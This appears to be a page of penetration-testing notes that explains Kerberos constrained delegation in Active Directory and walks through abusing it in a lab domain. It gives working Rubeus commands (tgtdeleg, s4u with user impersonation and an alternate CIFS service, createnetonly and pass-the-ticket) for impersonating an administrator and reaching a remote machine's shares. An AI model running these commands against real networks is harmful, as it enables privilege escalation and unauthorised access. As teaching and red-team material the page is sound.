Constrained Delegation

Constrained Delegation is a way to limit exactly what services a particular machine/account can access while impersonating other users. The "service" specified is a service principal name that the account is allowed to access while impersonating other users. PowerView can help in locating these attributes, the field of interest is the msds-allowedtodelegateto, but there's also a modification to the accounts' userAccountControl property. Essentially, if a computer/user object has a userAccountControl value containing TRUSTED_TO_AUTH_FOR_DELEGATION then anyone who compromises that account can impersonate any user to the SPNs set in the msds-allowedtodelegateto. Benjamin Delpy metioned that SeEnableDelegationPrivilege being required to actually modify the parameters.

What's the Risk?

If you are able to compromise a user account with SPNs set under msds-allowedtodelegateto can pretend to be any user they want to the target service SPN. For the HOST SPN this allows complete remote takeover. For MSSQL SPN this would allow DBA rights. A CIFS SPN would allow complete remote file access. A HTTP SPN this would likely allow for the takeover of the remote web-service, and LDAP allows for DCSync. HTTP/SQSL service accounts, even if they aren't elevated admin on the target, can possibly be abused with Rotten potato to elevate right to SYSTEM.

Attack

First let us start using PowerView in the below screenshot you may see that the user jwick is allowed to delegate or in other words impersonate any user and authenticate to a file system.

We liked to focus onto the section for msds-allowedtodelegateto

Now let us dump some tickets and find the correct one for the station we are trying to access .Let's now request a delegation TGT for the user jwick

Rubeus tgtdeleg

From here we will use the s4u attack from Rubeus to impersonate a user that has administrator access to the machine Desktop-Delta and continue from there, we want to change the service to CIFS to allow us to list the directories:

Rubeus s4u /ticket:<Ticket from TGTDELEG> /domain:dominioncyber.local /impersonateuser:jwinchester /msdsspn:http/desktop-delta.dominioncyber.local /dc:dominioncyberdc.dominioncyber.local /ptt /altservice:cifs

REMOVE THE DOMAIN FROM THE MSDSSPN, CAREFUL SOMETIMES THE MSDSSPN SECTION WILL ALSO BE ENCAPSULATED IN DOUBLE QUOTES (" ")

Above once we receive the "Ticket successfully imported!" message we can copy the 2nd ticket from the output for later compromise if needed "Remember these are time based"

From here we can create a process using Rubeus, inject the ticket to that process and allow us network actions.

Administrator Privileges from here this is only needed to perform netowrk actions

Rubeus createnetonly /program:C:\Windows\System32\cmd.exe

We save this information and now ptt onto the LUID and then impersonate the process

Now impersonate the process

And for some strange reason I would receive something like this

So I did some research and found that ired.team had the same issues and requested the ticket in a different way by removing the DOMAIN from the msdsspn section

/impersonateuser:jwinchester /msdsspn:cifs/DESKTOP-DELTA /ptt

[Removed some sections of the original command]

By doing that change I managed to enumerate the shares as I am aware jwick is an Administrator on station Delta.

PreviousUnconstrained Delegation NextDCSync

Last updated 2 years ago